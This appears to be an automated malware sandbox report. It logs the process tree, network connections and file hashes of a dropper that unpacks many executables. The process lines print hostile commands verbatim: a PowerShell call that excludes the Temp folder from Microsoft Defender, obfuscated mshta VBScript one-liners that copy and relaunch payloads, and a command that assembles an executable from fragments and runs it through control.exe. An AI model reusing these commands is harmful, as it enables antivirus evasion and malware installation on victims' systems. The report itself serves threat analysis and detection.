C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat057428ebfd0d.exe
Sat057428ebfd0d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053d2789b60d.exe
Sat053d2789b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05786a45dda23f71f.exe
Sat05786a45dda23f71f.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe
Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe
Sat056c52386ee94b16c.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe
Sat0556e72238ef5897.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ff081f766eeabb8.exe
Sat05ff081f766eeabb8.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05d374c30e.exe
Sat05d374c30e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat058b772138cf0f3.exe
Sat058b772138cf0f3.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ae182be20069e.exe
Sat05ae182be20069e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05a28e92796e93d.exe
Sat05a28e92796e93d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe
Sat0546bbc15e4.exe
C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp" /SL5="$40280,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat058b772138cf0f3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 592
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1864 -ip 1864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe" ) do taskkill -F -Im "%~nXU"
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
C:\Windows\SysWOW64\taskkill.exe
taskkill -F -Im "Sat0546bbc15e4.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
C:\Windows\SysWOW64\control.exe
control .\FUEj5.QM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4432 -ip 4432
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 684
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 772
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa9db6cc40,0x7ffa9db6cc4c,0x7ffa9db6cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3076 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3116 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1072
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3780,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1276
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1524
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\62301960872.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\60149422774.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\84864388368.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1928
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0556e72238ef5897.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 844
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0556e72238ef5897.exe" /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4940 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5236,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5228,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5384 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\e589555.exe
"C:\Users\Admin\AppData\Local\Temp\e589555.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5576 -ip 5576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 780
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5344,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\e58ce48.exe
"C:\Users\Admin\AppData\Local\Temp\e58ce48.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1748 -ip 1748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 780
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5140,i,13285092388581701263,11438016361492553547,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5420 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| NL | 45.133.1.182:80 | tcp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | safialinks.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| N/A | 127.0.0.1:63842 | tcp | |
| N/A | 127.0.0.1:63844 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| FI | 65.108.20.195:6774 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | 47.215.142.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| LV | 45.142.215.47:27643 | tcp | |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | 161.227.145.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 104.26.2.46:80 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe
| MD5 | d2c0ac81784893ea8836d60489528679 |
| SHA1 | 2a7bbec3d73cc75d7357d89052b99a39f2cc7258 |
| SHA256 | fffb99157b6596b90ed54dfc493e143c34bbabc262261291bb62738e7d3c070d |
| SHA512 | 4ab47b782b405d278c8600811cda54457a1cca60af5e6fde0763a44a0746f89d43205cef91f21aec95fe0d8ebcd2513d50922c8dbd311d0bf5a66d6f239b2e2f |
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
